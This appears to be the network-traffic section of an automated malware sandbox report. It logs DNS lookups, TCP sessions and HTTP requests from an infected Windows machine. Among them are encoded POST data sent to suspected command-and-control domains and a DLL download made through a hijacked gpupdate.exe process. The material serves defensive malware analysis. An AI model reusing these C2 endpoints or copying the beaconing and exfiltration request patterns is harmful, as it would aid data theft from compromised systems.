                                            Nov 12, 2024 11:20:04.136446953 CET4916980192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:20:04.141485929 CET804916915.197.148.33192.168.2.22
                                            Nov 12, 2024 11:20:05.153671980 CET4917080192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:20:05.158627987 CET804917015.197.148.33192.168.2.22
                                            Nov 12, 2024 11:20:05.158690929 CET4917080192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:20:05.166052103 CET4917080192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:20:05.171004057 CET804917015.197.148.33192.168.2.22
                                            Nov 12, 2024 11:20:21.039622068 CET804917015.197.148.33192.168.2.22
                                            Nov 12, 2024 11:20:21.039884090 CET804917015.197.148.33192.168.2.22
                                            Nov 12, 2024 11:20:21.039977074 CET4917080192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:20:21.048928976 CET4917080192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:20:21.053829908 CET804917015.197.148.33192.168.2.22
                                            Nov 12, 2024 11:20:26.119170904 CET4917180192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:26.124187946 CET8049171162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:26.124309063 CET4917180192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:26.144787073 CET4917180192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:26.150135994 CET8049171162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:26.150213003 CET4917180192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:26.151247978 CET8049171162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:26.156496048 CET8049171162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:26.841028929 CET8049171162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:26.880086899 CET8049171162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:26.880168915 CET4917180192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:27.646055937 CET4917180192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:28.662940979 CET4917280192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:28.667794943 CET8049172162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:28.667865038 CET4917280192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:28.678906918 CET4917280192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:28.683928967 CET8049172162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:29.368853092 CET8049172162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:29.407412052 CET8049172162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:29.407500029 CET4917280192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:30.188961029 CET4917280192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:31.205828905 CET4917380192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:31.210715055 CET8049173162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:31.210803986 CET4917380192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:31.222253084 CET4917380192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:31.227246046 CET8049173162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:31.227272987 CET8049173162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:31.227334976 CET4917380192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:31.232376099 CET8049173162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:31.232388020 CET8049173162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:31.909250975 CET8049173162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:31.947513103 CET8049173162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:31.947572947 CET4917380192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:32.731787920 CET4917380192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:33.749571085 CET4917480192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:33.754558086 CET8049174162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:33.754638910 CET4917480192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:33.762178898 CET4917480192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:33.767151117 CET8049174162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:34.442708015 CET8049174162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:34.481054068 CET8049174162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:34.481167078 CET4917480192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:34.499182940 CET4917480192.168.2.22162.213.249.216
                                            Nov 12, 2024 11:20:34.504122972 CET8049174162.213.249.216192.168.2.22
                                            Nov 12, 2024 11:20:34.749459982 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:20:34.754884958 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:20:34.754987955 CET4916680192.168.2.2245.33.6.223

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 12, 2024 11:19:41.234606028 CET5456253192.168.2.228.8.8.8
                                            Nov 12, 2024 11:19:41.386395931 CET53545628.8.8.8192.168.2.22
                                            Nov 12, 2024 11:19:47.124037981 CET5291753192.168.2.228.8.8.8
                                            Nov 12, 2024 11:19:47.147372007 CET53529178.8.8.8192.168.2.22
                                            Nov 12, 2024 11:19:57.504961967 CET6275153192.168.2.228.8.8.8
                                            Nov 12, 2024 11:19:57.518596888 CET53627518.8.8.8192.168.2.22
                                            Nov 12, 2024 11:20:26.069871902 CET5789353192.168.2.228.8.8.8
                                            Nov 12, 2024 11:20:26.116975069 CET53578938.8.8.8192.168.2.22

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Nov 12, 2024 11:19:41.234606028 CET192.168.2.228.8.8.80xfc81Standard query (0)www.kevin-torkelson.infoA (IP address)IN (0x0001)false
                                            Nov 12, 2024 11:19:47.124037981 CET192.168.2.228.8.8.80x2e58Standard query (0)www.sqlite.orgA (IP address)IN (0x0001)false
                                            Nov 12, 2024 11:19:57.504961967 CET192.168.2.228.8.8.80x50bdStandard query (0)www.myjiorooms.servicesA (IP address)IN (0x0001)false
                                            Nov 12, 2024 11:20:26.069871902 CET192.168.2.228.8.8.80x91b3Standard query (0)www.vasehub.xyzA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Nov 12, 2024 11:19:41.386395931 CET8.8.8.8192.168.2.220xfc81No error (0)www.kevin-torkelson.info208.91.197.27A (IP address)IN (0x0001)false
                                            Nov 12, 2024 11:19:47.147372007 CET8.8.8.8192.168.2.220x2e58No error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)false
                                            Nov 12, 2024 11:19:57.518596888 CET8.8.8.8192.168.2.220x50bdNo error (0)www.myjiorooms.servicesmyjiorooms.servicesCNAME (Canonical name)IN (0x0001)false
                                            Nov 12, 2024 11:19:57.518596888 CET8.8.8.8192.168.2.220x50bdNo error (0)myjiorooms.services15.197.148.33A (IP address)IN (0x0001)false
                                            Nov 12, 2024 11:19:57.518596888 CET8.8.8.8192.168.2.220x50bdNo error (0)myjiorooms.services3.33.130.190A (IP address)IN (0x0001)false
                                            Nov 12, 2024 11:20:26.116975069 CET8.8.8.8192.168.2.220x91b3No error (0)www.vasehub.xyz162.213.249.216A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • www.kevin-torkelson.info
                                            • www.sqlite.org
                                            • www.myjiorooms.services
                                            • www.vasehub.xyz

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.2249165208.91.197.27801720C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 12, 2024 11:19:41.406984091 CET500OUTGET /757p/?3VXDE=Ef/fEwz7M+sd6DpHwM43OJi57430VLhD3GIDM36QPdL4P0LchFUI8u/fJBYoMgu0o7JVWIxPRGxhpYLP1YXy3Xv4ifrcOfVL+pZNAtC/uDJJAA/bvm88hS2+dRm+&XJNx=abrdnJXXqdPhC HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.kevin-torkelson.info
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Z667T Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                            Nov 12, 2024 11:19:42.434348106 CET1236INHTTP/1.1 200 OK
                                            Date: Tue, 12 Nov 2024 10:19:41 GMT
                                            Server: Apache
                                            Referrer-Policy: no-referrer-when-downgrade
                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_ZnnRUkT4sym54XC1jg5t2x1z/UpkmGS84MONz7E+9A7Cgtxqwrf/0KaBfeWMM1TcTfHz4EIqk1dwf6R2WNpyKA==
                                            Content-Length: 2640
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 5a 6e 6e 52 55 6b 54 34 73 79 6d 35 34 58 43 31 6a 67 35 74 32 78 31 7a 2f 55 70 6b 6d 47 53 38 34 4d 4f 4e 7a 37 45 2b 39 41 37 43 67 74 78 71 77 72 66 2f 30 4b 61 42 66 65 57 4d 4d 31 54 63 54 66 48 7a 34 45 49 71 6b 31 64 77 66 36 52 32 57 4e 70 79 4b 41 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_ZnnRUkT4sym54XC1jg5t2x1z/UpkmGS84MONz7E+9A7Cgtxqwrf/0KaBfeWMM1TcTfHz4EIqk1dwf6R2WNpyKA=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.kevin-torkelson.info/px.js?c
                                            Nov 12, 2024 11:19:42.434370041 CET1236INData Raw: 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 65 76 69 6e 2d 74 6f 72 6b 65 6c 73 6f 6e 2e 69 6e 66 6f 2f
                                            Data Ascii: h=1"></script><script type="text/javascript" src="http://www.kevin-torkelson.info/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height
                                            Nov 12, 2024 11:19:42.434381962 CET424INData Raw: 22 72 6f 62 6f 74 73 22 3e 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0d
                                            Data Ascii: "robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"></head><body><div id="partner"></div>
                                            Nov 12, 2024 11:19:42.434391975 CET588INData Raw: 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0d 0a 20 20 20 20 20 20 20 20 2b 20 27 53 6b 65 6e 7a 6f 72 37 27 0d 0a 20 20 20 20 20 20 20 20 2b 20 27 2f 70 61 72 6b 2e 6a 73 3f 72 65 67 5f 6c 6f 67 6f 3d 6e 65 74 73 6f 6c 2d 6c 6f 67 6f
                                            Data Ascii: ocation.host + '/' + 'Skenzor7' + '/park.js?reg_logo=netsol-logo.png&amp;reg_href_text=This+Page+Is+Under+Construction+-+Coming+Soon%21&amp;reg_href_url=&amp;reg_href_text_2=Why+am+I+seeing+this+%27Under+Construction%27+page%


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.224916645.33.6.223803532C:\Windows\SysWOW64\gpupdate.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 12, 2024 11:19:47.184221983 CET274OUTGET /2020/sqlite-dll-win32-x86-3320000.zip HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Z667T Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                            Host: www.sqlite.org
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Nov 12, 2024 11:19:47.772578001 CET249INHTTP/1.1 200 OK
                                            Connection: keep-alive
                                            Date: Tue, 12 Nov 2024 10:19:47 GMT
                                            Last-Modified: Mon, 25 May 2020 16:29:38 GMT
                                            Cache-Control: max-age=120
                                            ETag: "m5ecbf272s799b7"
                                            Content-type: application/zip; charset=utf-8
                                            Content-length: 498103
                                            Nov 12, 2024 11:19:47.772840023 CET1236INData Raw: 50 4b 03 04 14 00 00 00 08 00 3b 13 b7 50 ec b6 66 a3 63 05 00 00 a1 16 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 42 27 c8 5e 42 27 c8 5e 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 85 98 cd 92 e4 26 0c 80 ef fb 36 bb 93
                                            Data Ascii: PK;Pfcsqlite3.defUTB'^B'^ux&69$(lnv0xt#9??"9d1[#%!yIo2_Z0.qZpT"&mb3E-g&GLho#98]<
                                            Nov 12, 2024 11:19:47.772855043 CET1236INData Raw: 6f 26 95 62 2c 09 76 fe 6c 55 9e c2 0b 62 bd 37 61 24 5f 9d b4 c9 ea 05 12 bb 9d 84 bd f4 77 64 f7 64 83 06 d3 9c fc 20 e4 ac 27 33 f6 34 7b 8b e3 0e e8 92 bc 19 3d 45 6d be 3e 69 9b ae 4f ca b2 75 45 dd e1 bb 5c 4d 71 67 15 be d1 ea 53 74 2d 0c
                                            Data Ascii: o&b,vlUb7a$_wdd '34{=Em>iOuE\MqgSt-8gJ"m%YYoDkEBr=LC0GAgO1BV,KV:?:'0>Q3/D|#?b;PK;Pq(||s
                                            Nov 12, 2024 11:19:47.772866964 CET1236INData Raw: 72 e3 79 b2 30 4d 49 a9 8a 37 b4 c6 60 6e 84 d4 1a 63 d1 43 f6 40 6b 8c 4d 0f bf 14 83 fd 9c 3c 78 1f e2 57 28 16 9a 51 f1 f2 4b 6c 1c 42 37 c3 c7 cb 7e f1 7b 06 ec 8d f5 39 b5 1c c6 cb 8c 3f 0c 10 e6 57 3e ad 8c 37 84 fa c7 c2 e1 c8 ac fc 03 23
                                            Data Ascii: ry0MI7`ncC@kM<xW(QKlB7~{9?W>7#1Z(;*]X%2_B)dripC5@vRF[/[1y$TG$5:oa6@(5W@}~W8,Lw"}p2K79{+
                                            Nov 12, 2024 11:19:47.772880077 CET1236INData Raw: f5 65 fa 30 9e d0 72 ff 42 e2 e9 81 c5 e3 1b e5 a4 99 7e de dc ea 3e c8 e8 0c 77 3f 1b 41 77 9f ba 58 68 38 b1 1b 31 6d 46 a7 a3 cd 9b e8 cb 89 35 48 31 72 c0 a8 9e b7 77 3b da 20 23 1e 40 c2 af 9a e5 01 4e 3e c3 71 03 a4 ec 20 77 0c 0b 26 09 0d
                                            Data Ascii: e0rB~>w?AwXh81mF5H1rw; #@N>q w&3^HPL0IRs->[VNe9YB2]~:j/;S1}E](E}h{y{IQ/W~orOsr HAn;s;8sT}c,-,{jq=
                                            Nov 12, 2024 11:19:47.772896051 CET1236INData Raw: ff 0d 32 21 22 b5 07 f4 b6 66 01 64 ad 23 66 d6 c5 30 8e a1 64 3b f5 ec 00 1c 9d 9f 95 f5 7e e6 ee ed bc b3 5f 50 cb 3f 9b d3 de bc 38 db ba e1 07 fa 61 d6 4c 97 20 1d 35 8d 04 ed 1d c3 e7 e9 23 b2 a5 b6 5b 52 61 d6 1f dc 9e fd a6 60 30 54 ce 84
                                            Data Ascii: 2!"fd#f0d;~_P?8aL 5#[Ra`0T<qBCrdDL>"Op+pUa*[XXEze\bfv.4D%-'ChPMfK|KuFxMju29p'/Mj 8yMrx
                                            Nov 12, 2024 11:19:47.772910118 CET1060INData Raw: 5c 0b cd bb c2 0d 70 cd 0e cf 40 a5 aa 3e 42 13 20 9a 1c 22 6d 8d 4a 72 e3 97 c9 5c 2b 69 db 7e 1a 7a 65 b8 11 fe 19 b8 53 8d 21 73 63 af 99 1b e1 da 58 49 d2 4a 1a 21 5b 63 28 99 3b c4 5d 26 ad 37 62 d6 ed 5f 62 de 46 c5 dc f8 a5 99 3b e5 4f 89
                                            Data Ascii: \p@>B "mJr\+i~zeS!scXIJ![c(;]&7b_bF;O<3m_|#;pL)'BNBVU8,/9 .{z[]@e7H}xx [0,mXguW:5[R9:j6Ki:&|
                                            Nov 12, 2024 11:19:47.772926092 CET1236INData Raw: 04 b4 83 e5 23 4c ae 18 0f 67 53 61 a8 f6 92 4e b8 b2 5d 45 8e ed 8b 61 6c 02 6c 2f dc a1 45 fd c3 c3 80 ba 2f 64 0c c3 16 83 13 65 21 d0 d2 26 ef 00 2d ea 87 b8 03 dc 08 39 0c 5b 58 82 1d 97 a1 ed 5a 72 68 78 43 9a bf 90 73 7c ba 71 8a e3 90 f0
                                            Data Ascii: #LgSaN]Eall/E/de!&-9[XZrhxCs|q@xQ BE9VQYMFViM.U:oG$ATtUX,#F9p-^h3nLgK+H,'RA-*j%8d}b&:rL~KKG6L
                                            Nov 12, 2024 11:19:47.772938967 CET1236INData Raw: e0 00 a8 27 58 3d 83 dc 4e 0b 78 ff 4a 1e c6 8e 27 2d ea 47 e4 51 5e 9d 83 32 00 de 5f c2 eb 70 59 5a b3 fa 26 d9 c0 33 2a 6b e9 38 b9 8a e3 5e 9a 82 52 13 a0 59 f1 d6 c3 1e 88 a0 34 8b 2f eb 6d 29 1e 57 c8 f2 64 43 b1 76 13 26 ec 2b 4e 45 61 d3
                                            Data Ascii: 'X=NxJ'-GQ^2_pYZ&3*k8^RY4/m)WdCv&+NEaCkrf8HS|;ijLZ#g@X)9ACc1V\u|$.M+ogl?jw",?de2d]oT_h]]M.i:Q0P"j'fl6
                                            Nov 12, 2024 11:19:47.772954941 CET1236INData Raw: 6b 6d 77 55 26 ca d2 e0 24 85 81 da ac b5 72 6e 6d b7 64 c3 d8 56 3e 0d 7b ab 3c a1 c5 c7 2e 91 bf b2 aa 07 57 93 ce 55 13 17 8f 2b 4b 84 5d a5 0b 1d 5d 5e 2b f0 d3 15 0e db 83 12 0f 3b 22 36 57 ed 87 03 4f 23 02 da c7 f9 23 5c ed b4 8a 17 76 b9
                                            Data Ascii: kmwU&$rnmdV>{<.WU+K]]^+;"6WO##\vrEpzL*.% ~BDhgMFkw(gNe-xw2<(Y(lK4)tQ*pf]h+T\[x!^1/B,kn^ey*
                                            Nov 12, 2024 11:19:47.777530909 CET1236INData Raw: 99 a9 b7 bf c2 71 19 b2 f5 6c 4d a5 8e eb 8e 13 ef 51 c0 da 37 6c e2 1d 5e 45 8a c9 f6 1c 15 bd 2c 8b b7 a7 7a 36 9d 4d 8e 5f 77 8a 78 7b f4 1c b0 27 f1 6e 5a dc f6 a0 dc 68 55 df ad 90 bd 5f 19 2b e7 56 d0 b2 af a8 d4 eb 5f c2 55 10 b3 b0 eb 93
                                            Data Ascii: qlMQ7l^E,z6M_wx{'nZhU_+V_U</4W_+hvcYx@nkCJ"{{#$QOoE^eHheJ]:4[l290HH&5ZrNAmB}ThCCn


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.224916715.197.148.33801720C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 12, 2024 11:19:57.543263912 CET2472OUTPOST /fksk/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.myjiorooms.services
                                            Origin: http://www.myjiorooms.services
                                            Referer: http://www.myjiorooms.services/fksk/
                                            Content-Type: application/x-www-form-urlencoded
                                            Content-Length: 2162
                                            Cache-Control: max-age=0
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Z667T Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                            Data Raw: 33 56 58 44 45 3d 4f 59 58 34 43 42 32 6f 66 57 70 41 48 2b 67 37 33 30 50 6c 38 38 50 4d 4e 35 2b 6f 48 6b 75 38 34 4a 43 44 32 49 31 62 52 64 6d 77 69 57 2f 5a 4b 49 46 66 53 4d 34 71 77 55 65 35 41 4a 4d 55 76 64 57 43 6f 38 38 72 37 37 45 51 53 56 6a 42 35 67 65 45 4b 59 7a 67 46 38 56 50 56 61 64 30 67 55 76 38 6d 48 7a 56 73 59 54 66 66 64 77 42 65 6b 69 48 67 42 65 38 6d 6a 6e 6e 4c 54 2b 57 76 43 4a 70 74 74 4c 43 73 49 2f 64 6c 4b 4e 46 32 58 42 39 55 54 69 65 38 6a 47 49 57 4f 2b 43 52 62 54 32 62 6a 4e 52 6b 30 5a 46 37 78 75 41 39 42 67 79 5a 62 61 2f 62 68 48 78 34 47 63 35 61 76 49 58 36 71 64 77 4c 36 41 78 4d 57 36 6e 54 4b 49 59 55 62 2f 39 57 77 69 78 32 38 7a 6c 7a 32 4c 72 4a 58 76 34 64 7a 4b 4b 57 32 32 69 47 43 45 70 34 50 6f 66 4f 37 49 59 64 45 34 62 68 49 49 74 4d 44 64 6e 64 6a 66 66 71 58 78 68 4b 4f 75 4d 62 79 59 42 5a 79 41 43 79 71 39 55 41 62 4b 72 71 70 59 6c 35 74 79 39 39 42 6c 64 35 58 39 73 6b 35 35 4c 50 4e 57 6e 68 47 6b 4a 74 44 53 54 2f 5a 75 6b 6a 39 76 6d [TRUNCATED]
                                            Data Ascii: 3VXDE=OYX4CB2ofWpAH+g730Pl88PMN5+oHku84JCD2I1bRdmwiW/ZKIFfSM4qwUe5AJMUvdWCo88r77EQSVjB5geEKYzgF8VPVad0gUv8mHzVsYTffdwBekiHgBe8mjnnLT+WvCJpttLCsI/dlKNF2XB9UTie8jGIWO+CRbT2bjNRk0ZF7xuA9BgyZba/bhHx4Gc5avIX6qdwL6AxMW6nTKIYUb/9Wwix28zlz2LrJXv4dzKKW22iGCEp4PofO7IYdE4bhIItMDdndjffqXxhKOuMbyYBZyACyq9UAbKrqpYl5ty99Bld5X9sk55LPNWnhGkJtDST/Zukj9vmI3gAyzNoY3XyZVE3mW1xHa5HExivetQbGFUaMR0tcgyNbr3okOBqnTxT8TrtBbKyBJ/eAlgai2gmPTqADvfcvObGFDRW3789NFwsdJc1Sag2uNTQWkoToBZ+FY837IqqmGGsSTvOhwynnH8adKFH7SBZeGCInkSyPsJmeh0ob5pjTJPimD/VZxSPYAmtXklRzuChLEP4WX+CtB+ipXDMenA0FAQaRPDkcDrBsykNaS7qnZC0hc6XCQnivpBVld4tiA1DecAoLV4yp8ZRWZP0BqmMZeklGVS73FHcNOGh6q/l/Ipd18W/2hOYbQbiuBqabsC4E/fwKux25TpjGeCujzYeMjMkZ7JvBJoin7jJ5fr39CxxMGswnctCbim0sJd0T9nd1wdczfwuPHxnPp7sgnadzWBG9A3sdtfYvLDRM5Zg4iKv6mtKzPq9eJZ8EX2Ig+hrVx1sZuOkWZADqHeE1q5Xkfz5gcmFJQdDPFlrL6Lii5e5JDHx5AgQURdXPrHcutGRetAMN5Hnr0wJXWB6FbVYpguOMe0Cf4t8qFsiNPO+nBMx3v0PA4awJ8twa0+7Os4EbnclL6Bst2sdIU68kZlUZEOGiuT5W6rqb9JbtKrSfiO0rGRkJWM3TotC+p7QcrPCXK54znivVtLYQoHYsqCFBZ/674nfip [TRUNCATED]
                                            Nov 12, 2024 11:19:57.548221111 CET260OUTData Raw: 57 45 7a 51 6a 48 31 67 30 75 47 70 57 61 6b 39 41 68 51 5a 77 7a 77 6d 68 6b 76 4b 36 31 4c 4a 4a 70 74 59 62 4b 69 5a 63 41 59 6e 73 36 59 2f 6c 45 63 2f 65 6e 4f 78 38 31 59 39 56 4d 70 4c 44 58 37 79 4e 51 46 48 45 43 6d 2b 59 37 67 32 67 68
                                            Data Ascii: WEzQjH1g0uGpWak9AhQZwzwmhkvK61LJJptYbKiZcAYns6Y/lEc/enOx81Y9VMpLDX7yNQFHECm+Y7g2ghbIsfUh5ofnggDJeJ0HjbDxUjt5qmco10P+7MTexlHW8sB2HtAG5tK9Dl9vt5ghCclH0+noxv5SZ+1w7rOXGfy7RxlA/MxkWuPJiIxgSjDhyMU4mlgIX0cGgnrScEz1dRxm9B9bcz2VsWA3lWXacTuaisrdKxAgDxU


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.224916815.197.148.33801720C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 12, 2024 11:20:00.084325075 CET771OUTPOST /fksk/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.myjiorooms.services
                                            Origin: http://www.myjiorooms.services
                                            Referer: http://www.myjiorooms.services/fksk/
                                            Content-Type: application/x-www-form-urlencoded
                                            Content-Length: 202
                                            Cache-Control: max-age=0
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Z667T Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                            Data Raw: 33 56 58 44 45 3d 4f 59 58 34 43 42 32 6f 66 57 70 41 48 2f 67 37 32 6c 50 6c 2f 63 50 4d 4f 35 2b 6f 4d 45 75 79 34 4a 4f 78 32 4a 42 31 52 72 43 77 69 48 6a 5a 66 72 68 66 52 4d 34 70 34 30 65 31 4e 70 4d 64 76 64 57 6b 6f 39 51 72 37 2f 73 51 54 32 62 42 74 52 65 62 49 6f 7a 69 51 73 56 53 56 61 52 48 67 55 6a 53 6d 47 62 56 73 5a 2f 66 65 5a 63 42 4f 53 32 48 33 78 65 2b 6b 6a 6e 77 4c 54 69 48 76 43 59 71 74 74 62 43 73 5a 6a 64 6c 34 46 46 78 47 42 39 44 44 69 64 6d 54 48 49 52 62 4c 4e 5a 72 6e 47 56 42 31 51 6f 48 31 42 7a 58 36 77 6b 79 4a 37 62 2b 4b 49 5a 46 36 6a 38 53 64 52 49 77 3d 3d
                                            Data Ascii: 3VXDE=OYX4CB2ofWpAH/g72lPl/cPMO5+oMEuy4JOx2JB1RrCwiHjZfrhfRM4p40e1NpMdvdWko9Qr7/sQT2bBtRebIoziQsVSVaRHgUjSmGbVsZ/feZcBOS2H3xe+kjnwLTiHvCYqttbCsZjdl4FFxGB9DDidmTHIRbLNZrnGVB1QoH1BzX6wkyJ7b+KIZF6j8SdRIw==


